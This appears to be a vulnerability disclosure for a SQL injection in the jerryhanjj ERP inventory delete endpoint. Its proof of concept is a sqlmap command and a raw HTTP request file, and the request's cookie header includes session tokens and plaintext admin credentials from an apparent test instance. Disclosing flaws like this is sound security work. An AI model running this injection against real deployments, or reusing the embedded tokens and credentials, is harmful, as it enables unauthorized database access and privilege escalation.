[description]
jerryhanjj ERP was discovered to contain a SQL Injection vulnerability via the URI /index.php/basedata/inventory/delete.
[Vulnerability Type]
SQL Injection
[Vendor of Product]
ERP,https://github.com/jerryhanjj/ERP
[Affected Product Code Base]
commit<=44bd04758b7d21b44c9db0954ec636472a7c0acf
[Impact Escalation of Privileges]
true
[POC] sqlmap command (the request file a.txt it reads is given below):
sqlmap -r a.txt -p id --batch --banner --flush-session
a.txt (contents of the request file; note that the Cookie header carries session cookies for an admin user, so this appears to be a post-authentication injection — confirm whether the endpoint is also reachable without a valid session):
POST /index.php/basedata/inventory/delete?action=delete HTTP/1.1
Host: 192.168.0.183:11180
Content-Length: 4
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.183:11180
Referer: http://192.168.0.183:11180/index.php/settings/goods_list
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: i18next=en; Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImU0ZjJhZWJmLWVkMDEtNGM0OC04YjU4LTI3OTFjMzllMzFmMCJ9.0J-cqM7f9-cNNDe8_Q3CAiWkq4iyNqLDbBUh6mnYfRl1Ygv4HPIp3Ky1cbbpN3_4Zr8lYluJ5-nEunFvF84Xyw; sidebarStatus=0; pro_end=-1; ltd_end=-1; serverType=nginx; order=id%20desc; memSize=32012; sites_path=/www/wwwroot; distribution=ubuntu; force=0; load_type=null; uploadSize=1073741824; rank=a; form_proxy=%5Bobject%20Object%5D; backup_path=/www/backup; pnull=1; load_page=1; _ga=GA1.1.2111016145.1721287966; _ga_J1DQF09WZC=GS1.1.1721287966.1.1.1721292532.0.0.0; weberp_installation=li98qb9dmcjbkupdsthditlpb3; files_sort=name; showRow=2000; Module=AP; PHPSESSIDwebERPteam=hnbgetkfg5o9mdts1ul0tt7a92; BatchPaste=2; name_reverse=True; SESSIONID=c5a998ac-ac1a-4102-962c-14f81e5eaa7d.JwnPi9EhaYyZfpOkyruZnGmLVBQ; request_token=wWTYlCvGWOyw1n0ms4ax4jl6ZBogX70mIk1wC4M9vZXHnFgO; copyFileName=null; is_admin=false; layers=5; cutFileName=null; load_search=undefined; PHPSESSID=br11orm7m3b7qqksr2ie4tk2gj; BatchSelected=null; Path=/www/wwwroot/1111.com/application/config; vcodesum=8; username=admin; userpwd=admin123456; ispwd=1; 
met_session=a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%222f1ec1e9a1b2a45a55a379baca839552%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A117%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_15_7%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F126.0.0.0+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1721704716%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22username%22%3Bs%3A5%3A%22admin%22%3Bs%3A7%3A%22userpwd%22%3Bs%3A11%3A%22admin123456%22%3Bs%3A5%3A%22token%22%3Bs%3A32%3A%2225e975d1b5e94f53d507b4f5e25d1581%22%3Bs%3A5%3A%22ispwd%22%3Bs%3A1%3A%221%22%3Bs%3A6%3A%22jxcsys%22%3Ba%3A4%3A%7Bs%3A3%3A%22uid%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%E9%9F%A9%E4%BF%8A%E6%9D%B0%22%3Bs%3A8%3A%22username%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22login%22%3Bs%3A3%3A%22jxc%22%3B%7D%7D0ca5755443107035b416222797ce1964
Connection: keep-alive
id=3%